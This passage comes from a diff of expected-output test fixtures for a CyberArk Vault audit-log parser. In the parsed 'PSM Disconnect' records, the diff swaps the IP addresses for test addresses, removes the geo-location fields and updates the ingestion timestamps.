Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:42\",\"IsoTimestamp\":\"2021-03-11T17:56:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813796Z", + "original": "\u003c5\u003e1 2021-03-11T17:56:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:42\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:42Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:42\",\"IsoTimestamp\":\"2021-03-11T17:56:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -708,20 +663,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -745,7 +691,7 @@ }, "@timestamp": "2021-03-11T20:23:30.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -757,15 +703,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T20:23:30Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -778,21 +724,21 @@ "psmid": "PSMServer", "session_id": "988b22e8-82a7-11eb-83b9-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115", + "dst_host": "67.43.156.15", "session_duration": "00:00:12" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Disconnect", "timestamp": "Mar 11 12:23:30", "desc": "PSM Disconnect" @@ -804,8 +750,8 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-06-09T10:24:31.624809500Z", - "original": "\u003c5\u003e1 2021-03-11T20:23:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:30\",\"IsoTimestamp\":\"2021-03-11T20:23:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813801300Z", + "original": "\u003c5\u003e1 2021-03-11T20:23:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:30\",\"IsoTimestamp\":\"2021-03-11T20:23:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -828,39 +774,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -877,7 +802,7 @@ }, "@timestamp": "2021-03-14T13:49:54.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -888,16 +813,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:49:54Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -909,14 +833,14 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "d284c268-2ba0-4366-af52-e33459b073a1", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:00:18" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -928,9 +852,9 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 14 06:49:54", "desc": "PSM Disconnect" @@ -942,8 +866,8 @@ "event": { "severity": 2, "duration": 